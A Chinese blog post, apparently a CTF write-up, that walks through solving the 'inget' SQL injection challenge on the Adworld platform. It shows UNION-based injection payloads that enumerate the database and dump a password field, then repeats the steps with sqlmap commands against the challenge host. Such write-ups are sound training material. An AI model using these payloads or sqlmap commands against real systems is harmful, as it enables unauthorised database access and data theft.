记攻防世界里的一次SQL注入

最新推荐文章于 2024-05-10 21:16:18 发布

UnGrOSec团队

最新推荐文章于 2024-05-10 21:16:18 发布

阅读量201

点赞数 5

文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_67488888/article/details/132452344

版权

攻防世界的inget SQL注入

在这里插入图片描述

打开场景

在这里插入图片描述

文中翻译过来就是让我绕过ID 感觉有点SQL注入的感觉

先一个个试试

在这里插入图片描述

?id=1'union select 1,2 --+

发现确实存在SQL注入

懂了先手工测测，能手工就手工，最后再跑sqlmap验证

在这里插入图片描述

?id=1' union select 1,database()--+

直接爆出来数据库名 cyber

这就好办了，利用 group_concat()

在这里插入图片描述

?id=1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = 'cyber'--+

发现爆出来表还是cyber

继续利用爆出字段

在这里插入图片描述

?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_schema = 'cyber'--+

发现爆出来三个字段

不用想以攻防世界的尿性flag肯定在pw字段

直接查看

在这里插入图片描述

直接得到flag

下面使用sqlmap直接跑出来flag

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -dbs

利用这个跑出数据库

在这里插入图片描述

发现跑出来了数据库 cyber

继续

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber --tables

跑出表

在这里插入图片描述

发现跑出了表cyber

继续

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber --columns

跑出字段

在这里插入图片描述

查看

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber -C pw --dump

在这里插入图片描述

ok 得到了字段内容也就得到了flag 新手做CTF的时候最好不要一开始就用sqlmap，最好自己手工注入

UnGrOSec团队

关注

5
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
记攻防世界里的一次SQL注入

ok 得到了字段内容也就得到了flag 新手做CTF的时候最好不要一开始就用sqlmap，最好自己手工注入。懂了先手工测测，能手工就手工，最后再跑sqlmap验证。文中翻译过来就是让我绕过ID 感觉有点SQL注入的感觉。不用想以攻防世界的尿性flag肯定在pw字段。这就好办了，利用 group_concat()下面使用sqlmap直接跑出来flag。直接爆出来数据库名 cyber。发现跑出来了数据库 cyber。发现爆出来表还是cyber。发现跑出了表cyber。继续利用爆出字段。
复制链接

扫一扫